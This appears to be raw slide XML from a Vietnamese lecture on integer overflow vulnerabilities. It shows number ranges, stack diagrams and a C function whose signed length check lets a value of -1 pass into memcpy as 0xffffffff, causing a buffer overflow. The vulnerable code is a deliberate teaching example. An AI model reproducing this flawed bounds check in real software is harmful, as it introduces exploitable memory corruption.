          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79CC70B-93B2-406B-9111-A7D33238CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701385" y="5053598"/>
            <a:ext cx="4160516" cy="800099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">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Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF27B60-0FC5-4A59-B003-C6617146A653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86346" y="5161607"/>
            <a:ext cx="8729662" cy="609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30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11D7010-5776-4D8C-8D30-30E283E3DCA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3176748" y="5200441"/>
            <a:ext cx="838198"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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello World%n</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DD0956-0E7A-45D8-AE89-4999A60DAA76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409054" y="5194091"/>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%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B5AFB3-5E44-46DB-A5F0-5CD9298C96F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2290116" y="5200441"/>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%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D578FFA0-6955-4549-BC58-7C6297CA7322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7314641" y="5200441"/>
            <a:ext cx="838198"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rPr>
              <a:t>args</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A80CAE6-7D3A-4DC5-B57D-CA8037FAC047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539353" y="5181602"/>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%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B208C162-42DA-4DDA-B8DC-4ED57CA3FC7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420415" y="5187952"/>
            <a:ext cx="838199"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8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8AB38D-BCB5-44E5-834C-BBBDDF4E4C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="5200441"/>
            <a:ext cx="590295" cy="5191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rPr>
              <a:t>11</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Connector 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DA20DA-E652-44AB-B3B9-A32D3213A87C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86346" y="3810000"/>
            <a:ext cx="8905254"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95CA4D88-2451-49FB-9241-D48014444EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103218" y="3356837"/>
            <a:ext cx="2716182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Có lỗi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32B6EA6-DC74-4BA4-853F-B69FAD98F2E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86346" y="3967541"/>
            <a:ext cx="2716182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Không có lỗi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200254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BF45-7705-495E-9D2F-609292451FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn số nguyên</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA00090-5C53-4252-9C9B-E8FB9DC760C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Trong máy tính, số nguyên đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợc biểu diễn bằng trục số tròn. Dải biểu diễn:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Số nguyên có dấu: [–2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>n – 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>n–1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – 1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Số nguyên không dấu: [0, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – 1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflow: Biến số nguyên của ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ơng trình nhận một giá trị nằm ngoài dải biểu diễn. Ví dụ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Số nguyên có dấu: 0x7ff..f + 1 = 0x80..0,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Số nguyên không dấu: 0xff..f + 1 = 0x0, 0x0 – 1 = 0xff...f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ngôn ngữ bị ảnh hưởng: Tất cả</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Việc không kiểm soát hiện t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợng tràn số nguyên có thể dẫn đến các truy cập các vùng nhớ mà không thể kiểm soát.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CACCBDB-196A-48A8-B9F1-D95B17B893D6}"/>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241341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80C1-1276-49AB-92A4-611638771C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn số nguyên – Ví dụ 1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72471E9D-1CC2-4828-B289-01979094D865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng nằm ở đâu?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>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0EB0D581-C794-4BC3-9039-93C9D98F7DF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C409D17-4ACE-42FA-B47D-A1F18D456AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1676400"/>
            <a:ext cx="8077200" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define MAX 1024</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void vul_func1()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buff[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   int len = recv_len_from_client();//len is length of 					  //message from client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char *mess = recv_mess_from_client();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   if (len &gt; 1024)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  printf (“Too large”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  memcpy(buff, mess, len);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">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F1B5F2B-A237-4731-ABD2-B15B63D7542C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="4552890"/>
            <a:ext cx="6934200" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memcpy(void* dst, void* src, unsigned int size)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F7172D-43D7-470D-858C-77FA755AFCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5334000"/>
            <a:ext cx="8077200" cy="707886"/>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len = -1 = 0xffffffff &lt; 1024</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memcpy(buff, mess, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xffffffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="200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721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B2C6-99A6-42E9-BC1D-6B4B004A78B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn số nguyên – Ví dụ 2</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F1AD6A8-FF32-41A2-AD38-9E5587B3E7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng nằm ở đâu?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BFDAD32-D680-4C73-9A65-3F27CEBB157C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC51FAFF-5C80-4A88-BE01-79ECA4B382C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1752600"/>
            <a:ext cx="8077200" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
